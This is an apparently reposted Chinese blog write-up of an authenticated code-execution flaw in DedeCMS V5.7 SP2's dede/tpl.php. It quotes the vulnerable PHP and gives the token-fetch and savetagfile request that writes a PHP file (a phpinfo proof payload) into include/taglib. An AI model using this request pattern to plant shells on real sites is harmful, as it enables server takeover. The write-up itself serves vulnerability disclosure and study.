dedecms 5.7 download.php 代码执行漏洞,CMS-Hunter/DedeCMS/DedeCMS V5.7 SP2后台存在代码执行漏洞 at master · SecWiki/CM...

最新推荐文章于 2021-04-09 08:44:51 发布
最新推荐文章于 2021-04-09 08:44:51 发布
阅读量141 收藏
点赞数
文章标签: dedecms 5.7 download.php 代码执行漏洞

Affected Version

DedeCMS V5.7 SP2

Code analysis

漏洞详情

默认后台地址 /dede/,文件dede/tpl.php中的251到281行。

csrf_check();

#filename和前面正则的匹配情况

if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))

{

ShowMsg('文件名不合法,不允许进行操作!', '-1');

exit();

}

require_once(DEDEINC.'/oxwindow.class.php');

#搜索filename中匹配`\.lib\.php$#i`的部分,以空格代替

$tagname = preg_replace("#\.lib\.php$#i", "", $filename);

#去掉反斜号

$content = stripslashes($content);

#拼接文件名

$truefile = DEDEINC.'/taglib/'.$filename;

#写入内容

$fp = fopen($truefile, 'w');

fwrite($fp, $content);

fclose($fp);

replace处理之后赋值给变量 $tagname 。但是写入文件的时候并没有用到$tagname 。

那为什么有这个$tagname,拼接文件名的时候,应该是拼接tagname

利用

1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。

2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。

3.这里还有一个csrf_check()函数,即请求中必须要带token参数。

漏洞利用

首先获取token。访问域名 + /dede/tpl.php?action=upload

d170f6bed3360da62d909d28a072c312

687474703a2f2f6f706d6932796467682e626b742e636c6f7564646e2e636f6d2f2f31382d332d382f35363239353933372e6a7067

2.然后访问

域名 + /dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

687474703a2f2f6f706d6932796467682e626b742e636c6f7564646e2e636f6d2f2f31382d332d382f31363236373830332e6a7067

shell 地址

域名 + /include/taglib/secnote.lib.php

687474703a2f2f6f706d6932796467682e626b742e636c6f7564646e2e636f6d2f2f31382d332d382f38313833303134302e6a7067

References

顾阑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CMS-Hunter
01-08
Content Management System Vulnerability Hunter
Python-爬取secwiki和xuanwugithubio分析安全信息站点安全趋势提取安全工作者账号
08-12
最后,为了方便代码的管理和维护,通常会将项目组织成一个Python模块或项目结构,例如在压缩包中的"sec_profile-master"目录下,可能包含了爬虫脚本、数据处理逻辑、配置文件等组成部分。使用版本控制工具如Git可以...
织梦download.php漏洞,织梦DedeCMS 5.7SP1 /plus/download.php url重定向漏洞的解决方法
weixin_36132709的博客
04-09 492
Dedecms 5.7SP1 /plus/download.PHP url重定向漏洞(如下图),对比官方网站最新下载包发现该漏洞未进行补丁,但官方自身网站已经补上了,而官方演示站点均未补上。解决思路如下:PHP">$link = base64_decode(urldecode($link));跳转了PHP">header("location:$link");Dedecms系统的网站。P...
dedecms 5.7 download.php 代码执行漏洞,Dedecms V5.7后台任意代码执行[CVE-2018-7700] [高危漏洞][官方未修复]...
weixin_36410316的博客
04-02 744
漏洞的前提是登陆了后台,所以要不要修复大家看着办吧!该漏洞的触发点为/dede/tag_test_action.php。起因是csrf_check()的绕过,导致可执行任意代码。查看/dede/tag_test_action.php文件的源码:如果直接访问这个文件,会进入csrf_check()函数。提示token错误,且退出执行。跟进csrf_check(),该函数所在文件为dede/conf...
DedeCMS_v5.7_友情链接CSRF+任意文件写入漏洞
公众号shadow sock7
11-28 2732
参考:https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell 略鸡肋,需要管理员点击。 先在网站最下面点击“申请加入”,然后填入构造的网站链接: http://192.168.170.139:8888/dedecms_csrf.php 然后该链接需要服务器后台可以访问的地址即...
dedecms V5.7 SP2 web后台getshell
公众号shadow sock7
11-12 5194
https://www.freebuf.com/vuls/164035.html dede/tpl.php任意文件写入漏洞。 条件:已登录后台。 首先访问/dede/tpl.php?action=upload获取token值 访问/dede/tpl.php?filename=<yourname>.lib.php&action=savetagf
一生一世学不完系列-红蓝对抗.pdf
09-04
红队代表攻击者,尝试突破系统安全防护,寻找漏洞;蓝队则代表防御者,负责保护系统免受攻击。在这个过程中,双方通过实战演练来提升安全能力,确保组织的安全水平。 在红蓝对抗的学习中,可以参考以下资源: 1. *...
sec_profile:今天爬取secwiki和xuanwu.github.iosec.to,分析安全信息站点,安全趋势,提取安全工作者账号(twitter,weixin,github等)
02-11
针对攻击目标量身定制CS的Beacon执行 锦行信息安全 耶森塞克 技术分享,锦行杯比赛撰写 安全学术圈 secquan SerialDetector:Web对象注入突破的原理和实践探索 百度安全实验室 BaiXX_lab 基于DTLS协议的反射攻击...
Chinese-Security-RSS:网络安全资讯的RSS订阅,网络安全博客的RSS订阅
05-06
安全资讯名称网站RSS地址FreeBuf互联网安全新媒体平台安全客Seebug Paper绿盟嘶吼腾讯玄武实验室SecWiki News(国内外安全资讯)https://www.sec-wiki.com/news/https://www.sec-wiki.com/news/rss360 核心
基于springcloud微服务开发平台
07-22
采用前后端分离的模式,前端开源两个框架:Sword (基于 React、Ant Design)、Saber (基于 Vue、Element-UI) 后端采用SpringCloud全家桶,并同时对其基础组件做了高度的封装,单独开源出一个框架:BladeTool BladeTool已推送至Maven中央库,直接引入即可,减少了工程的臃肿,也可更注重于业务开发 集成Sentinel从流量控制、熔断降级、系统负载等多个维度保护服务的稳定性。 注册中心、配置中心选型Nacos,为工程瘦身的同时加强各模块之间的联动。 极简封装了多租户底层,用更少的代码换来拓展性更强的SaaS多租户系统。 借鉴OAuth2,自研多终端认证系统,可控制子系统的token权限互相隔离。 借鉴Security,自研Secure模块,采用JWT做Token认证,可拓展集成Redis等细颗粒度控制方案。 稳定生产了六年,经历了从 Camden -> Hoxton -> 2023 的技术架构,也经历了从fat jar -> docker -> k8s + jenkins的部署架构。 项目分包明确,规范微服务的开发模式,使包与包
毕业设计javajsp诗歌诗词网站sqlserver-qr源码含文档工具包
07-22
毕业设计javajsp诗歌诗词网站sqlserver-qr源码含文档工具包 页面是jsp,数据库sqlserver,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 诗韵人间网站 系统管理 修改密码 年代管理 年代录入 诗词管理 诗词录入 诗词搜索 留言板 包含:源码、数据库脚本、论文、答辩ppt、开题报告、环境工具包、相同框架项目的安装教程(在说明文档中)
【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码)
07-22
【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正
凯度:2022凯度银行保险行业品牌建设报告:以差异化博弈变局,洞察银行保险业的品牌增长之道(1).pdf
07-22
凯度:2022凯度银行保险行业品牌建设报告:以差异化博弈变局,洞察银行保险业的品牌增长之道(1).pdf
国潮风(11)---喜爱PPT.pptx
最新发布
07-22
【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
实现用户登录系统的前后端开发
07-22
实现用户登录系统的前后端开发
立式辊磨机健康状态综合评价与预测研究-陈作炳.pdf
07-22
立式辊磨机健康状态综合评价与预测研究-陈作炳.pdf
泰凌微8258学习日记-2:用按钮控制RGB改变小灯的颜色
07-22
泰凌微8258学习日记-2:用按钮控制RGB改变小灯的颜色
使用 JavaScript 源代码进行颜色处理.zip
07-22
项目:使用 JavaScript 进行颜色处理(含源代码) 颜色处理是一个使用 JavaScript、CSS 和 HTML 开发的简单项目。该项目是一个小型、快速的颜色处理和转换库。用户/播放器必须输入颜色名称、颜色代码格式,并找到其他不同格式的颜色。  项目制作 颜色处理项目仅包含 HTML、CSS 和 JavaScript。它是一个用于输入颜色并以不同格式输出颜色的微框架。输入应尽可能宽松。谈到该项目的功能,用户必须输入颜色才能查看其不同的颜色格式。您必须在文本字段中输入颜色名称或代码,如果颜色有效,则将显示其颜色和其他格式。 该项目包含大量 JavaScript,以使流程能够正常运转。 如何运行该项目? 要运行此项目,您不需要任何类型的本地服务器,但需要浏览器。我们建议您使用现代浏览器,如 Google Chrome 和 Mozilla Firefox。首先,通过单击 index.html 文件在浏览器中打开项目。 项目演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
PP88-V5 (13).apk
07-22
PP88-V5 (13).apk

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值